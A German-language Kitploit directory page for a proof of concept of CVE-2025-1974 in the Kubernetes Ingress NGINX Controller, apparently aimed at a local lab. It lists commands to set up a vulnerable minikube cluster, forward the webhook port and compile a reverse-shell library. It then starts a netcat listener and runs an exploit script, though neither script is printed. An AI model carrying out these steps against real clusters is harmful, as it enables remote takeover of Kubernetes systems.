Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-1974 — CVE-2025-1974 PoC-Code | Kitploit
Tools/GitHubGitHub/zulloper/cve-2025-1974
Container-SicherheitSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCloud-Sicherheit
GitHubzulloper/cve-2025-1974

CVE-2025-1974

CVE-2025-1974 PoC-Code

Repository anzeigen
5vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-1974: Kubernetes Ingress Nginx Controller – Schwachstellenanalyse und Aufbau einer PoC-Umgebung

Testumgebung

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

Lokale Testumgebung einrichten (M2 MacOS)

Installiere minikube für lokale Tests

minikube start --driver=docker

Konfiguriere den ingress-nginx-controller mit dem folgenden Befehl:

kubectl apply -f ingress-nginx-controller.yml

Port-Weiterleitung

Überprüfen, ob die Pods ordnungsgemäß funktionieren

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Leite die Ports 80 und 8443 (Webhook) der Pods auf die lokalen Ports 8888 und 1337 weiter (Port-Weiterleitung für 80 und 8443 erforderlich)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

Vorbereitung der SO (Shared Object Library)

Ändere die IP und den Port für die Reverse Shell in rev_shell.c

Kompiliere unter MacOS (arm64) – je nach Testumgebung anpassen

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

AdmissionReview erstellen (optional, vorhandene Dateien können verwendet werden)

Konvertiere mit kube-review in das AdmissionReview-Format (JSON)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

Bereite die Reverse Shell-Verbindung mit nc vor

nc -lv 4444

Passe in exploit.py die Hosts und Ports von nginx und Webhook an und führe es aus

python3 exploit.py

img.png

Tool herunterladen